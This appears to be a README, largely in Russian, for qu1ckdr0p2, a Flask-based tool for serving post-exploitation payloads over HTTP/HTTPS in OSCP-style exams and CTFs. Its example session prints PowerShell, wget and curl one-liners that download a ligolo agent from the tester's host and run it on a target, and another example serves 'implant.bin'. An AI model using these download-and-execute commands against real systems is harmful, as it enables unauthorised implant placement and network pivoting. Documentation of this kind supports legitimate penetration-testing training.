
Быстро раздавайте файлы через http или https с помощью flask.
Быстрое размещение полезных нагрузок и бинарников для постэксплуатации по HTTP или HTTPS.
Разработано для использования на экзаменах вроде OSCP / PNPT или CTF-соревнованиях HTB и т.д.
Приветствуются pull request'ы и issue'ы. Любые вклады также приветствуются.
Qu1ckdr0p2 поставляется с функцией псевдонимов и поиска. Инструменты находятся в репозитории qu1ckdr0p2-tools. По умолчанию генерируется самоподписанный сертификат для использования с опцией --https, также приоритет отдаётся интерфейсу tun0 при запуске веб-сервера, в противном случае используется eth0.
Файл common.ini определяет сопоставленные псевдонимы, используемые в опциях --search и -u.
Когда веб-сервер запущен, на экран выводятся несколько загрузочных команд для копирования и вставки.
При копировании загрузочной команды, в зависимости от вашего терминального эмулятора, возможно, придётся БЫСТРО дважды или трижды щёлкнуть по ней, чтобы выделить для копирования. Это будет исправлено в одной из следующих версий.
pip3 install qu1ckdr0p2
echo "alias serv='~/.local/bin/serv'" >> ~/.zshrc
source ~/.zshrc
or
echo "alias serv='~/.local/bin/serv'" >> ~/.bashrc
source ~/.bashrc
serv init --update
$ serv serve -f implant.bin --https 443
$ serv serve -f file.example --http 8080
$ serv --help
Usage: serv [OPTIONS] COMMAND [ARGS]...
Welcome to qu1ckdr0p2 entry point.
Options:
--debug Enable debug mode.
--help Show this message and exit.
Commands:
init Perform updates.
serve Serve files.
$ serv serve --help
Usage: serv serve [OPTIONS]
Serve files.
Options:
-l, --list List aliases
-s, --search TEXT Search query for aliases
-u, --use INTEGER Use an alias by a dynamic number
-f, --file FILE Serve a file
--http INTEGER Use HTTP with a custom port
--https INTEGER Use HTTPS with a custom port
-h, --help Show this message and exit.
$ serv init --help
Usage: serv init [OPTIONS]
Perform updates.
Options:
--update Check and download missing tools.
--update-self Update the tool using pip.
--update-self-test Used for dev testing, installs unstable build.
--help Show this message and exit.
$ serv init --update
$ serv init --update-self
Номера сопоставленных псевдонимов для опции -u динамические, поэтому вам не нужно запоминать конкретные номера или когда-либо вводить имя инструмента.
$ serv serve --search ligolo
[→] Path: ~/.qu1ckdr0p2/windows/agent.exe
[→] Alias: ligolo_agent_win
[→] Use: 1
[→] Path: ~/.qu1ckdr0p2/windows/proxy.exe
[→] Alias: ligolo_proxy_win
[→] Use: 2
[→] Path: ~/.qu1ckdr0p2/linux/agent
[→] Alias: ligolo_agent_linux
[→] Use: 3
[→] Path: ~/.qu1ckdr0p2/linux/proxy
[→] Alias: ligolo_proxy_linux
[→] Use: 4
(...)
$ serv serve --search ligolo -u 3 --http 80
[→] Serving: ../../.qu1ckdr0p2/linux/agent
[→] Protocol: http
[→] IP address: 192.168.1.5
[→] Port: 80
[→] Interface: eth0
[→] CTRL+C to quit
[→] URL: http://192.168.1.5:80/agent
[↓] csharp:
$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('http://192.168.1.5:80/agent', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent'
[↓] wget:
wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent
[↓] curl:
curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent
[↓] powershell:
Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent
⠧ Веб-сервер запущен
MIT